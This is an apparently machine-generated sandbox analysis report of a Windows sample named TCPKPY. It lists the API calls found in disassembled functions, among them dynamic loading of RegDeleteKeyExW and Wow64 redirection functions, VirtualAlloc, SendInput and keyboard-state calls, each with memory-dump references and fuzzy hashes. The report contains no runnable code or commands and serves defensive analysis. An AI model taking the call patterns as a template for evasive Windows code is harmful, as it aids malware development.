                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00263AC2,?,00263CF7), ref: 00263ADA
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00263AEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                • Opcode ID: 963dc382850dec65998be5f7ba7b7eb2333c396d855188b76610683b5a0611d8
                                                                                                                • Instruction ID: e7634fb9d0b9608df1835f312959e6a3148db45c9e75d75a8826c3032210cfd6
                                                                                                                • Opcode Fuzzy Hash: 963dc382850dec65998be5f7ba7b7eb2333c396d855188b76610683b5a0611d8
                                                                                                                • Instruction Fuzzy Hash: 0AD0A935421323AFD720AFA0F88DA8277E8AF12706B10842DE4D9D2290EFF0C8D0CB10
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00203EBB,?,00203E91,?), ref: 00203ED3
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00203EE5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-1355242751
                                                                                                                • Opcode ID: 4da771940da6d3099d7b4220bfc4f236d12319fb98cbb9897cb1ba0d4b85323b
                                                                                                                • Instruction ID: 2edc0c4eba8219779b1a72876df5a55ec6b203aaa7a7051cbf3cb78a5c9da2c4
                                                                                                                • Opcode Fuzzy Hash: 4da771940da6d3099d7b4220bfc4f236d12319fb98cbb9897cb1ba0d4b85323b
                                                                                                                • Instruction Fuzzy Hash: 06D0A7384207139FD720DF22F80C65277D8AF04705B004519E549D11D0D7B0C4948710
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00203FAD,00203F28,?,00203F78,?,00203FAD,?,?,?,?,002034E2,?,00000001), ref: 00203F40
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00203F52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-3689287502
                                                                                                                • Opcode ID: 648fb44a40ebe4e030b599da05605f6b72d452375758a967ac615956ea144a56
                                                                                                                • Instruction ID: 0f12c14f29b72248e1e4799b0e58ed2b693984b89954492e75c604590f279e5f
                                                                                                                • Opcode Fuzzy Hash: 648fb44a40ebe4e030b599da05605f6b72d452375758a967ac615956ea144a56
                                                                                                                • Instruction Fuzzy Hash: A2D0A7398247139FD7309F21F81C68177E8AF04705B004819E64DD15D0D7B0C9988710
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 99ce2e351e12995aa1cdade5dae985cb77901434f93e62438e75e3749da3eae0
                                                                                                                • Instruction ID: a0cefeb7119bb2dd58017609bcab3691a56218869e14c54c2f5b191393c5433c
                                                                                                                • Opcode Fuzzy Hash: 99ce2e351e12995aa1cdade5dae985cb77901434f93e62438e75e3749da3eae0
                                                                                                                • Instruction Fuzzy Hash: 35C18FB5A20216EFDB14CF94C884EAEF7B6FF48704F1045A9E841AB251D770DE51CBA1
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00256AA6), ref: 0020AB2D
                                                                                                                • _wcscmp.LIBCMT ref: 0020AB49
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper_wcscmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 820872866-0
                                                                                                                • Opcode ID: 195d7c5835ce2d6a1355277b0ceaf604b8f83be340b11f475e89aee96d9b40f2
                                                                                                                • Instruction ID: 32263d4c9d1e3b1e2682184df9aea155c7711fa38662a129bbb2b1c5a14ca614
                                                                                                                • Opcode Fuzzy Hash: 195d7c5835ce2d6a1355277b0ceaf604b8f83be340b11f475e89aee96d9b40f2
                                                                                                                • Instruction Fuzzy Hash: A0A1F370B2030BDBDB15EF64E9856A9B7B5FF54300FA4416AEC16872D2DB309870DB46
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00260D85
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00260DC8
                                                                                                                  • Part of subcall function 00260458: CharLowerBuffW.USER32(?,?,?,?), ref: 00260478
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00260FB2
                                                                                                                • _memmove.LIBCMT ref: 00260FC2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3659485706-0
                                                                                                                • Opcode ID: f2e688f6e52ced0e494aa979d94d01d8076f9d58026686ceb4aa221514dabd27
                                                                                                                • Instruction ID: b889291ee77e78b9c766f451011bce872ae3df6cb491e0adf2d86b31bccf2a27
                                                                                                                • Opcode Fuzzy Hash: f2e688f6e52ced0e494aa979d94d01d8076f9d58026686ceb4aa221514dabd27
                                                                                                                • Instruction Fuzzy Hash: 78B1AD716243018FC714DF28C88096AB7E4EF89314F14896EF8999B352DB31ED95CF92
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0025AF56
                                                                                                                • CoUninitialize.OLE32 ref: 0025AF61
                                                                                                                  • Part of subcall function 00241050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002410B8
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0025AF6C
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0025B23F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 780911581-0
                                                                                                                • Opcode ID: 6970d593d590ab313690aeed53b6776cc71d57fac497747cf230c9d5c72904df
                                                                                                                • Instruction ID: 541e97233e3242b5ecd3d7c8b4308b714ffa707fd94f50fd0c5607e33a0e0f9c
                                                                                                                • Opcode Fuzzy Hash: 6970d593d590ab313690aeed53b6776cc71d57fac497747cf230c9d5c72904df
                                                                                                                • Instruction Fuzzy Hash: A9A16C356247029FC711DF14C891B1AB7E4BF88360F158459F999AB3A2DB30ED68CF86
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 3877424927-0
                                                                                                                • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                • Instruction ID: fcc7d2bfaa4381481dbfbb9c3b3eb764bb6f21182f52caed19c7f22dcf606a35
                                                                                                                • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                • Instruction Fuzzy Hash: BA51BB30A20226BBDB24FFE9A84069E77B5AF40320F248769F865961D0D7B09D71DF40
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0026C354
                                                                                                                • ScreenToClient.USER32(?,00000002), ref: 0026C384
                                                                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0026C3EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3880355969-0
                                                                                                                • Opcode ID: ebc1a57f2145e2579b65f7792e0816bf705d06034727dcb150ca15ee105d9309
                                                                                                                • Instruction ID: f833f597d762fb7ac12c4210515aff3b0db9ce7a19e7509e1636c19f9a952cb6
                                                                                                                • Opcode Fuzzy Hash: ebc1a57f2145e2579b65f7792e0816bf705d06034727dcb150ca15ee105d9309
                                                                                                                • Instruction Fuzzy Hash: 96517E31910209EFDF10EF68D884ABE7BA5FB45360F208259F8559B291D730EDA1CB90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0023D258
                                                                                                                • __itow.LIBCMT ref: 0023D292
                                                                                                                  • Part of subcall function 0023D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0023D549
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0023D2FB
                                                                                                                • __itow.LIBCMT ref: 0023D350
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3379773720-0
                                                                                                                • Opcode ID: 43171476a873b246c5734aec15f6ceda758408ea44212a96750da58dc5b0cbae
                                                                                                                • Instruction ID: c281182a6129a3811d5c5b79399ed4cbca138fdedff76341c52d0128be928a33
                                                                                                                • Opcode Fuzzy Hash: 43171476a873b246c5734aec15f6ceda758408ea44212a96750da58dc5b0cbae
                                                                                                                • Instruction Fuzzy Hash: 3E4193B1A10309ABDF11EF54D842BEE7BB9AF48700F000059FA05A3182DB719E65CF52
                                                                                                                APIs
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0024EF32
                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0024EF58
                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0024EF7D
                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0024EFA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3321077145-0
                                                                                                                • Opcode ID: 5ec272b14cfc6087a2c2fa9d014f06528af1c7b9f607591777dc31164155c042
                                                                                                                • Instruction ID: 69cf18b4021a718e978259d570264786e8a6ecbca8600a649ba7da93e0ca725a
                                                                                                                • Opcode Fuzzy Hash: 5ec272b14cfc6087a2c2fa9d014f06528af1c7b9f607591777dc31164155c042
                                                                                                                • Instruction Fuzzy Hash: B8413A39610611DFCB14EF15C584A49BBE5FF99320B1A8088E846AF3A2CB30FD64DF91
                                                                                                                APIs
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0026B3E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 634782764-0
                                                                                                                • Opcode ID: ba04cf6f72855b95409257d158452cbdb112bcc00b75b18be0dec13231f13383
                                                                                                                • Instruction ID: 9a9c7dd166e67d8886874eeda8402f961ac5f103500c85ab58c9f215b384db00
                                                                                                                • Opcode Fuzzy Hash: ba04cf6f72855b95409257d158452cbdb112bcc00b75b18be0dec13231f13383
                                                                                                                • Instruction Fuzzy Hash: 2731E434630249FBEF269F18DCA9FA83765AB05350F248112FA51D62E2DB70D8F09B51
                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 0026D617
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0026D68D
                                                                                                                • PtInRect.USER32(?,?,0026EB2C), ref: 0026D69D
                                                                                                                • MessageBeep.USER32(00000000), ref: 0026D70E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1352109105-0
                                                                                                                • Opcode ID: 04e1e3661ddff5c652208093a660ca9ea93eea4f7cb55361b6ae2ee5142ebb45
                                                                                                                • Instruction ID: bf5d8246c8434b711bb3411ae912555ed3411e278fcbdbeedfcb07e07f83df34
                                                                                                                • Opcode Fuzzy Hash: 04e1e3661ddff5c652208093a660ca9ea93eea4f7cb55361b6ae2ee5142ebb45
                                                                                                                • Instruction Fuzzy Hash: 22418D34F14119DFDB12CF59E885FA9BBF9BF45304F1841AAE4099B291D730E8A1CB90
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 002444EE
                                                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 0024450A
                                                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 0024456A
                                                                                                                • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 002445C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 38fa4b8de7b8b83db5b10d5414410cedeb3963b4773575fe36e99470ac073ebe
                                                                                                                • Instruction ID: 49298343fd05eb528b7b25317fc4795d1cc3ff9a6061ad1c71e780f37586e0fd
                                                                                                                • Opcode Fuzzy Hash: 38fa4b8de7b8b83db5b10d5414410cedeb3963b4773575fe36e99470ac073ebe
                                                                                                                • Instruction Fuzzy Hash: E43148719202595FFF38AF649808BFEBBB59B69314F84021AF0C1931C1C7749E68CB61
                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00234DE8
                                                                                                                • __isleadbyte_l.LIBCMT ref: 00234E16
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00234E44
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00234E7A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: 5a0088a91dd927af5a309bc9b97759cdb18fa263d0e2980e73458919f43c442f
                                                                                                                • Instruction ID: adbf9fd167f0f47240ab33254ef60262e65fb32ca833660b605ab374331e6dec
                                                                                                                • Opcode Fuzzy Hash: 5a0088a91dd927af5a309bc9b97759cdb18fa263d0e2980e73458919f43c442f
                                                                                                                • Instruction Fuzzy Hash: 9631B07162021AAFDF21AF75C845BAA7BB5FF42710F1545A9E821871A0E730F860DB90
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 00267AB6
                                                                                                                  • Part of subcall function 002469C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 002469E3
                                                                                                                  • Part of subcall function 002469C9: GetCurrentThreadId.KERNEL32 ref: 002469EA
                                                                                                                  • Part of subcall function 002469C9: AttachThreadInput.USER32(00000000,?,00248127), ref: 002469F1
                                                                                                                • GetCaretPos.USER32(?), ref: 00267AC7
                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00267B00
                                                                                                                • GetForegroundWindow.USER32 ref: 00267B06
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2759813231-0
                                                                                                                • Opcode ID: 50ce9c16c75f7ece644924578e7c4a3459a2b9de3cd72ba8f0cf0c34a8c9bfb9
                                                                                                                • Instruction ID: f1ea167086fc29adb254ffd660ff54c8d5beebdcf1eb0f2addc183879628f0cc
                                                                                                                • Opcode Fuzzy Hash: 50ce9c16c75f7ece644924578e7c4a3459a2b9de3cd72ba8f0cf0c34a8c9bfb9
                                                                                                                • Instruction Fuzzy Hash: AD313E76D10108AFCB00EFB5D8858EFBBF9EF58314B50806AF815E3211D6349E598FA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • GetCursorPos.USER32(?), ref: 0026EFE2
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0027F3C3,?,?,?,?,?), ref: 0026EFF7
                                                                                                                • GetCursorPos.USER32(?), ref: 0026F041
